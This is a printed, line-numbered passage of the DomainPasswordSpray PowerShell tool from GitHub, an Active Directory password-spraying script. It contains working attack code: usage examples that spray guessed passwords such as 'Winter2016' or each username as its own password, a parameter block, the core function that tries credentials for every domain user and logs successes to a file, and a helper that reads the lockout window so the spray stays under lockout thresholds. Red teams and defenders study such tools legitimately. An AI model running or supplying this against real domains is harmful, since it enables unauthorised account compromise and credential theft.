

```
27
           A list of passwords one per line to use for the password spray (Be very careful not to lockout
28
29
           .PARAMETER OutFile
30
           A file to output the results to.
31
32
           .PARAMETER Domain
33
34
35
           The domain to spray against.
36
           .PARAMETER Filter
37
38
39
           Custom LDAP filter for users, e.g. "(description=*admin*)"
40
41
           .PARAMETER Force
42
43
           Forces the spray to continue and doesn't prompt for confirmation.
44
           .PARAMETER Fudge
45
46
47
           Extra wait time between each round of tests (seconds).
48
           .PARAMETER Quiet
49
50
51
           Less output so it will work better with things like Cobalt Strike
52
53
           .PARAMETER UsernameAsPassword
54
           For each user, will try that user's name as their password
55
56
57
           .EXAMPLE
58
           C:\PS> Invoke-DomainPasswordSpray -Password Winter2016
59
60
           Description
61
62
           This command will automatically generate a list of users from the current user's domain and at	au
63
64
           .EXAMPLE
65
66
           C:\PS> Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlis
67
68
69
           Description
70
71
           This command will use the userlist at users.txt and try to authenticate to the domain "domain-r
72
```

```
73
            .EXAMPLE
 74
 75
            C:\PS> Invoke-DomainPasswordSpray -UsernameAsPassword -OutFile valid-creds.txt
 76
 77
            Description
 78
            -----
            This command will automatically generate a list of users from the current user's domain and att
 79
 80
 81
            #>
 82
            param(
 83
             [Parameter(Position = 0, Mandatory = $false)]
 84
             [string]
 85
             $UserList = "",
 86
 87
             [Parameter(Position = 1, Mandatory = $false)]
 88
             [string]
 89
             $Password,
 90
 91
             [Parameter(Position = 2, Mandatory = $false)]
92
             [string]
 93
             $PasswordList,
94
95
             [Parameter(Position = 3, Mandatory = $false)]
 96
             [string]
97
             $OutFile,
98
99
             [Parameter(Position = 4, Mandatory = $false)]
100
             [string]
             $Filter = "",
101
102
103
             [Parameter(Position = 5, Mandatory = $false)]
104
             [string]
             $Domain = "",
105
106
107
             [Parameter(Position = 6, Mandatory = $false)]
108
             [switch]
109
             $Force,
110
             [Parameter(Position = 7, Mandatory = $false)]
111
112
             [switch]
113
             $UsernameAsPassword,
114
115
             [Parameter(Position = 8, Mandatory = $false)]
116
             [int]
             $Delay=0,
117
112
```

mainPasswordSpray/DomainPasswordSpray.ps1 at b13d64a5834694aa73fd2aea9911a83027c465a7 · ithack/DomainPasswordSpray · GitHub - 31/10/2024 16:24 ps://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPassword			

```
499
        function Invoke-SpraySinglePassword
500
501
        {
502
            param(
                     [Parameter(Position=1)]
503
504
                     $Domain,
                     [Parameter(Position=2)]
505
506
                     [string[]]
                     $UserListArray,
507
508
                     [Parameter(Position=3)]
                     [string]
509
                     $Password,
510
                     [Parameter(Position=4)]
511
512
                     [string]
                     $OutFile,
513
                     [Parameter(Position=5)]
514
                     [int]
515
                     $Delay=0,
516
                     [Parameter(Position=6)]
517
                     [double]
518
                     $Jitter=0,
519
                     [Parameter(Position=7)]
520
521
                     [switch]
                     $UsernameAsPassword,
522
                     [Parameter(Position=7)]
523
524
                     [switch]
                     $Quiet
525
526
527
            $time = Get-Date
528
            $count = $UserListArray.count
529
            Write-Host "[*] Now trying password $Password against $count users. Current time is $($time.Tos
530
            $curr_user = 0
```

```
531
            if ($OutFile -ne ""-and -not $Quiet)
532
533
                Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile"
534
535
            $RandNo = New-Object System.Random
536
537
            foreach ($User in $UserListArray)
538
            {
539
                if ($UsernameAsPassword)
540
541
                    $Password = $User
542
                $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain,$User,$Password)
543
544
                if ($Domain_check.name -ne $null)
545
                {
                    if ($OutFile -ne "")
546
547
                    {
548
                         Add-Content $OutFile $User`:$Password
549
                    Write-Host -ForegroundColor Green "[*] SUCCESS! User:$User Password:$Password"
550
551
                }
552
                $curr_user += 1
                if (-not $Quiet)
553
554
                {
555
                    Write-Host -nonewline "$curr_user of $count users tested`r"
556
                if ($Delay)
557
558
                {
                    Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
559
560
                }
            }
561
562
563
        }
564
        function Get-ObservationWindow($DomainEntry)
565
566
        {
567
            # Get account lockout observation window to avoid running more than 1
            # password spray per observation window.
568
            $lockObservationWindow_attr = $DomainEntry.Properties['lockoutObservationWindow']
569
570
            $observation_window = $DomainEntry.ConvertLargeIntegerToInt64($lockObservationWindow_attr.Value)
571
            return $observation_window
572
        }
```